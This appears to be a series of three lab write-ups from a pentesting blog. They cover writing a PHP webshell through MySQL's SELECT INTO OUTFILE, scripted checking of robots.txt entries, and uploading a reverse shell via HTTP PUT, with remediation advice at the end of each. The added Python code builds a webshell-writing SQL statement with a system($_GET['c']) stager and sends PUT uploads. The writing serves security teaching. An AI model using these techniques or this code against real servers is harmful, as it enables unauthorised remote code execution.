Shell upload through MySQL statement

Today, I will talk about how to write a shell onto a server through a MySQL statement.

Introduction

MySQL is an open-source relational database management system (RDBMS). Its name is a combination of “My”, the name of co-founder Michael Widenius’s daughter, and “SQL”, the abbreviation for Structured Query Language.

So MySQL is a database service, like MariaDB (a fork of MySQL) or Microsoft SQL Server.

In this context, I was exploiting a vulnerable VM, Stapler 1 from VulnHub. I had access to the MySQL service and I was wondering how to write a shell file onto the server, in order to connect to it later.

Topology

[Topology diagram]

Exploitation

So I have remote access to the MySQL service using the password "plbkac":

[Screenshot: remote MySQL login]

Then I list the available databases:

[Screenshot: SHOW DATABASES output]

Many databases are stored on the server. I will upload a shell to it. First I generate the payload with msfvenom; do not forget to set LHOST to the machine the server will connect back to (the attack machine).

Msfvenom combines payload generation and encoding. It replaced msfpayload and msfencode on June 8th, 2015.

[Screenshot: msfvenom command]

Let's have a look at the generated file:

[Screenshot: generated PHP payload]

To summarise: msfvenom created a reverse TCP shell in PHP, base64-encoded. Once executed, the host running the shell initiates a TCP connection to 192.168.0.5 on port 4444.

Now I write the shell into the server's web root with a SQL statement (SELECT ... INTO OUTFILE):

[Screenshot: SELECT ... INTO OUTFILE statement]

To be sure the statement worked, I check the website:

[Screenshot: the uploaded PHP file served by the web server]

The reverse TCP shell was successfully uploaded as this PHP file!
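Here is an added example (my own code, not from the original post or from Metasploit) that shows what has to be true on the MySQL side for this write to work, and builds the statement itself. The SHOW GRANTS rows, the secure_file_priv value and the web-root path below are constructed assumptions for the demo, not the values from the Stapler VM.

```python
"""Added example: pre-checks and statement builder for SELECT ... INTO OUTFILE/DUMPFILE.

Not from the original post.  Grant rows, secure_file_priv and the target path
are constructed for the demo.
"""
import base64
import posixpath
import re


def has_file_privilege(grants):
    """True if any SHOW GRANTS row confers the global FILE privilege.

    FILE is a global privilege, so only grants ON *.* count; a grant limited
    to one database (ON wp.*) never allows writing files.
    """
    for row in grants:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+\*\.\*\s", row, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "ALL PRIVILEGES" in privs or "ALL" in privs or "FILE" in privs:
            return True
    return False


def outfile_target_allowed(secure_file_priv, target):
    """Apply the secure_file_priv rules to a requested output path.

    None (NULL) -> the server refuses every INTO OUTFILE/DUMPFILE and LOAD DATA
    ''          -> no restriction
    directory   -> only files inside that directory (after path normalisation)
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = posixpath.normpath(secure_file_priv)
    return posixpath.normpath(target).startswith(base + "/")


def can_write_webshell(grants, secure_file_priv, target):
    """Combine both checks and say which one blocks the write."""
    if not has_file_privilege(grants):
        return False, "account lacks the global FILE privilege"
    if not outfile_target_allowed(secure_file_priv, target):
        return False, "secure_file_priv forbids writing to %s" % target
    return True, "ok"


def sql_string_literal(text):
    """Quote text as a MySQL single-quoted literal (backslash is the escape)."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def php_stager(b64_php):
    """msfvenom-style wrapper: the real payload stays base64-encoded inside,
    so the PHP source contains no quotes or backslashes of its own."""
    return "<?php eval(base64_decode('%s')); ?>" % b64_php


def build_write_statement(php_source, target, dumpfile=True):
    """Build the statement that drops php_source on disk.

    INTO DUMPFILE writes the single value byte for byte.  INTO OUTFILE applies
    the default FIELDS ESCAPED BY '\\' rules and appends a newline, which turns
    every backslash in the payload into a double backslash and can break
    multi-line PHP.  Both refuse to overwrite an existing file, and the file is
    created by the mysqld system user, so that user needs write access to the
    target directory.
    """
    verb = "DUMPFILE" if dumpfile else "OUTFILE"
    return "SELECT %s INTO %s %s;" % (
        sql_string_literal(php_source), verb, sql_string_literal(target))


if __name__ == "__main__":
    # constructed SHOW GRANTS output for a root account reachable over the network
    grants = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"]
    secure_file_priv = ""                      # SELECT @@secure_file_priv; -> ''
    target = "/var/www/html/shell.php"         # assumed web root, not the VM's
    ok, why = can_write_webshell(grants, secure_file_priv, target)
    print("write possible:", ok, "-", why)
    if ok:
        inner = b"system($_GET['c']);"         # stand-in for the msfvenom payload
        stager = php_stager(base64.b64encode(inner).decode())
        print(build_write_statement(stager, target))
```

Paste the real output of SHOW GRANTS and SELECT @@secure_file_priv into the two inputs before trying the write; when the check fails, no amount of retrying the statement will help, and the error message (ERROR 1045 for a missing FILE privilege, ERROR 1290 for secure_file_priv) tells you which wall you hit.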

Now I will use multi/handler. The multi handler just starts the payload listener and waits for an incoming connection (or connects out, for bind payloads).

[Screenshot: multi/handler configuration]

I specify my IP and port, 192.168.0.5:4444: the same values I set when generating the payload.

I request the infected web page using -k, which makes the connection "insecure": no certificate verification. I request...

[Screenshot: HTTP request to the uploaded PHP file]

... and I get a remote shell on the server:

[Screenshot: Meterpreter/PHP session opened]

Remediation

The statement "SELECT ... INTO OUTFILE" (and "INTO DUMPFILE") requires the global FILE privilege, so it should never be available to unprivileged database users: do not grant FILE, or ALL PRIVILEGES ON *.*, to application accounts; set secure_file_priv in my.cnf to a directory outside the web root, or to NULL to disable file writes entirely; and do not expose the MySQL service on the network with a reusable password. The web root should not be writable by the mysql system user either.

Conclusion

This is a way to gain remote access to a server through a MySQL statement.

msfvenom and multi/handler are just one way to get the reverse TCP shell; the MySQL file write is the actual vulnerability.

Robots.txt entries checker

Today, I will talk about the information disclosure that comes from the robots.txt file.

Introduction

From the Moz website, here the description of what is the purpose of the file robots.txt:

"Robots.txt is a text file webmasters create to instruct web robots (typically search engine robots) how to crawl pages on their website. The robots.txt file is part of the robots exclusion protocol (REP), a group of web standards that regulate how robots crawl the web, access and index content, and serve that content up to users.

In practice, robots.txt files indicate whether certain user agents (web-crawling software) can or cannot crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents.”

In this context, I was exploiting the vulnerable SkyDog 1 VM from VulnHub. As I always do first, I checked whether a robots.txt file was on the web server.

Fortunately, there was one, but it had hundreds of entries. I can't check them one by one, so I script it.

Topology

[Topology diagram]

Exploitation

As I said, the robots.txt file had hundreds of entries!

I download the file:

[Screenshot: downloading robots.txt]

I look at the beginning and the end of the file:

[Screenshot: head and tail of robots.txt]

I count how many entries there are:

[Screenshot: line count of robots.txt]

Around three hundred entries to check! I have to script it, which I do in Python:

#################################################################
#Objective: 
# Check robots.txt
#Description: 
# Test each entries in robots.txt
#Date:
# 02/08/2018
#################################################################

import requests

# clean the robots.txt file: keep only the Allow/Disallow lines and
# strip the directive and its leading slash, leaving the bare path
infile = "robots.txt"
outfile = "cleaned_file.txt"

delete_list = ["Disallow: /", "Allow: /"]

print("cleaning file...")
with open(infile) as fin, open(outfile, "w") as fout:
    for line in fin:
        if not line.startswith(("Allow:", "Disallow:")):
            continue                     # skip User-agent, comments, blank lines
        for word in delete_list:
            line = line.replace(word, "")
        if line.strip():
            fout.write(line)

# request every cleaned entry; a body without "404 Not Found" is reported as UP
# (a catch-all home page also passes this test, hence the false positives)
match = '404 Not Found'

with open(outfile) as fclean:
    for entry in fclean:
        entry = entry.strip()
        url = "http://192.168.0.7/%s" % entry
        body = requests.get(url).text
        if match not in body:
            print("UP: " + url)

Then I run the script:

[Screenshot: script output listing the entries reported UP]

Only the last URL leads to a good hint. The others are false positives that simply display the web server's home page.

[Screenshot: the page found through the last robots.txt entry]
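As an added example (my own code, not the post's script above), here is a checker that parses robots.txt properly and tells a real hit apart from the "every path shows the home page" false positives, by fingerprinting the home page and comparing each response to it. The base URL, the sample robots.txt and the fake site are constructed for the demo; the fetch function is injected so the code runs offline, and the usage note below shows how to plug in requests.

```python
"""Added example: robots.txt entry checker with soft-404 / catch-all detection.

Not from the original post.  SAMPLE_ROBOTS and SAMPLE_SITE are constructed
demo data, not content from the SkyDog VM.
"""
import hashlib
from urllib.parse import urljoin


def parse_robots(text):
    """Return the unique Allow/Disallow paths, in file order.

    Comments (# ...), blank lines and User-agent/Sitemap/Crawl-delay lines
    are skipped.  'Disallow:' (empty) and '/' add nothing and are dropped.
    """
    paths, seen = [], set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        if field.strip().lower() not in ("allow", "disallow"):
            continue
        value = value.strip()
        if value in ("", "/") or value in seen:
            continue
        seen.add(value)
        paths.append(value)
    return paths


def is_pattern(path):
    """Wildcard rules (* or a trailing $) are patterns, not requestable URLs."""
    return "*" in path or path.endswith("$")


def fingerprint(body):
    return hashlib.sha256(body.encode("utf-8", "replace")).hexdigest()


def classify(status, body, home_fp):
    """Label one response; 'hit' and 'forbidden' are the ones worth a look."""
    if status == 404 or "404 Not Found" in body:
        return "missing"
    if status in (401, 403):
        return "forbidden"        # exists but protected: still a lead
    if 300 <= status < 400:
        return "redirect"
    if status == 200 and fingerprint(body) == home_fp:
        return "homepage"         # catch-all route: the false positive above
    if status == 200:
        return "hit"
    return "other"


def probe(base_url, robots_text, fetch):
    """fetch(url) -> (status, body).  Returns {url_or_pattern: label}."""
    _, home_body = fetch(base_url)
    home_fp = fingerprint(home_body)
    results = {}
    for path in parse_robots(robots_text):
        if is_pattern(path):
            results[path] = "pattern"
            continue
        url = urljoin(base_url, path)
        status, body = fetch(url)
        results[url] = classify(status, body, home_fp)
    return results


def interesting(results):
    return sorted(u for u, label in results.items() if label in ("hit", "forbidden"))


# --- constructed demo data ---
SAMPLE_ROBOTS = """\
User-agent: *
# old admin area
Disallow: /admin/
Disallow: /backup.zip
Disallow: /
Allow: /public/
Disallow: /*.php$
Sitemap: http://example.test/sitemap.xml
"""

SAMPLE_SITE = {
    "http://example.test/": (200, "<html>home</html>"),
    "http://example.test/admin/": (403, "Forbidden"),
    "http://example.test/backup.zip": (200, "PK\x03\x04..."),
    "http://example.test/public/": (200, "<html>home</html>"),  # catch-all
}


def fake_fetch(url):
    return SAMPLE_SITE.get(url, (404, "<h1>404 Not Found</h1>"))


if __name__ == "__main__":
    for url, label in probe("http://example.test/", SAMPLE_ROBOTS, fake_fetch).items():
        print("%-10s %s" % (label, url))
```

Against a real target, pass a fetcher such as `lambda u: (lambda r: (r.status_code, r.text))(requests.get(u, allow_redirects=False))` so redirects are reported rather than followed; the "homepage" label is what turned the three hundred entries into a handful worth opening.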

And finally, by looking at the source code, I moved on in the pentest to the Astronomy directory, which had directory listing enabled:

[Screenshot: directory listing of the Astronomy directory]

Remediation

Don't list the most sensitive parts of your website in your robots.txt file. Web crawlers are useful for indexing the marketing/commercial pages, not the sensitive ones. Remember that robots.txt is advisory: it only asks well-behaved robots to stay away, anyone can read it, and it provides no access control. Protect sensitive paths with authentication and keep them out of the file.

Conclusion

The robots.txt file is sometimes the first hint to sensitive folders and documents on a web server. Looking for it should be one of the first steps of a pentest on a web application exposed to the Internet.

If you have any question, I will be glad to answer you back 🙂

You can also find me on Twitter: gr3g0v1tch!

HTTP PUT

Today, I will talk about the HTTP PUT vulnerability: a web server that accepts the PUT method and lets anyone write files into its web root.

Table of contents:

  1. Introduction
  2. Topology
  3. Detection
  4. Attack
  5. Remediation
  6. Conclusion

Introduction

From the MDN webdocs, here the description of HTTP verb PUT : “The HTTP PUT request method creates a new resource or replaces a representation of the target resource with the request payload.”

In this context, I was exploiting the vulnerable SickOS v1.2 VM from VulnHub. After discovering that directory listing was enabled, I wanted to know more about the page.

Topology

topo.png

Detection

To find out which request methods a server advertises, issue an OPTIONS request with curl and read the Allow header of the response:

[Screenshot: curl OPTIONS request and Allow header]

The HTTP PUT method is sometimes used in REST APIs. Knowing that HTTP PUT is permitted, I try to upload a simple PHP file to the server. Here is the content of the file:

[Screenshot: content of the test PHP file]

Attack

I try sending it:

[Screenshot: PUT request sent with curl]

The command seems to have succeeded; let's inspect the web page:

[Screenshot: uploaded file visible in the directory listing]

And if I try executing it:

[Screenshot: output of the uploaded PHP file]

So PHP is indeed executed on the server. Now I will upload a reverse TCP shell from pentestmonkey to get a remote connection to the server. I set my own IP and the port I want to be reached on. I chose 443 because it may be seen as a "trusted" destination port by the target server's outbound firewall rules:

[Screenshot: pentestmonkey PHP reverse shell with IP and port set]

This time, I upload the file with an Nmap NSE script (http-put) instead of curl:

[Screenshot: nmap http-put upload]

I wait for a connection on the chosen port:

[Screenshot: netcat listener on port 443]

If I hit the file I just uploaded with an HTTP request...

[Screenshot: HTTP request to the uploaded reverse shell]

... I gain remote access with nc. The nc (netcat) utility is used for just about anything involving TCP or UDP: -l is listen mode, -p the port number and -n numeric only, no DNS.

[Screenshot: reverse shell received in netcat]

Then post-exploitation could be done to become root on the server, but that was not the point here!
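Here are the detection and upload steps above as an added example (my own code, not from the original post, curl or the Nmap script): parse the Allow header of an OPTIONS reply, flag the write methods, build and send a PUT, and read the status the way RFC 7231 defines it. The host, port and file names are assumptions for the demo; only the functions under __main__ touch the network.

```python
"""Added example: HTTP method discovery and PUT upload, not from the original post.

Host 192.0.2.10 (a documentation address), the port and the file names are
assumptions; no network call is made outside __main__.
"""
import http.client

# Methods that let a client change server state; PUT/DELETE on a static web
# root are the ones worth testing first.
WRITE_METHODS = {"PUT", "DELETE", "PATCH", "MKCOL", "MOVE", "COPY", "PROPPATCH"}


def parse_allow(header):
    """'GET, POST,put ,OPTIONS' -> {'GET', 'POST', 'PUT', 'OPTIONS'}"""
    if not header:
        return set()
    return {m.strip().upper() for m in header.split(",") if m.strip()}


def risky_methods(header):
    """Sorted list of advertised methods that can modify the server."""
    return sorted(parse_allow(header) & WRITE_METHODS)


def build_put_request(host, path, body, content_type="application/x-php"):
    """Raw HTTP/1.1 PUT as it goes on the wire (what curl -T or the nmap
    http-put script sends).  Returned as bytes for inspection and tests."""
    head = ("PUT %s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Content-Type: %s\r\n"
            "Content-Length: %d\r\n"
            "Connection: close\r\n\r\n") % (path, host, content_type, len(body))
    return head.encode("ascii") + body


def upload_succeeded(status):
    """RFC 7231 section 4.3.4: 201 = created, 200/204 = existing resource replaced."""
    return status in (200, 201, 204)


def options(host, port, path="/"):
    """Send OPTIONS and return (status, Allow header or None)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    allow = resp.getheader("Allow")
    conn.close()
    return resp.status, allow


def put(host, port, path, body, content_type="application/x-php"):
    """Send PUT with the given body and return (status, reason)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("PUT", path, body=body, headers={"Content-Type": content_type})
    resp = conn.getresponse()
    conn.close()
    return resp.status, resp.reason


if __name__ == "__main__":
    host, port = "192.0.2.10", 80          # assumed target, not the VM's address
    status, allow = options(host, port)
    print("OPTIONS ->", status, "Allow:", allow, "risky:", risky_methods(allow))
    if "PUT" in parse_allow(allow):
        marker = b"<?php echo 'put-test-ok'; ?>\n"   # harmless probe file
        status, reason = put(host, port, "/test.php", marker)
        print("PUT /test.php ->", status, reason,
              "ok" if upload_succeeded(status) else "failed")
```

Two caveats a practitioner should keep in mind: an Allow header is only what the server claims (some servers omit PUT from Allow yet accept it, others list it and then return 405 for a given path), so the PUT probe is the real test; and a 201 only proves the write, not execution, which is why the post then fetches the file and checks that the PHP ran.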

Remediation

On the server side, disable the HTTP PUT method (and the other write methods such as DELETE) wherever it is not needed, for example by restricting the allowed methods in the web server configuration. Where uploads are genuinely required, require authentication, accept only an explicit allowlist of extensions rather than a blacklist, and store uploaded files outside the directory from which the server executes scripts.

Conclusion

This is a vulnerability that can easily be checked on any web server.
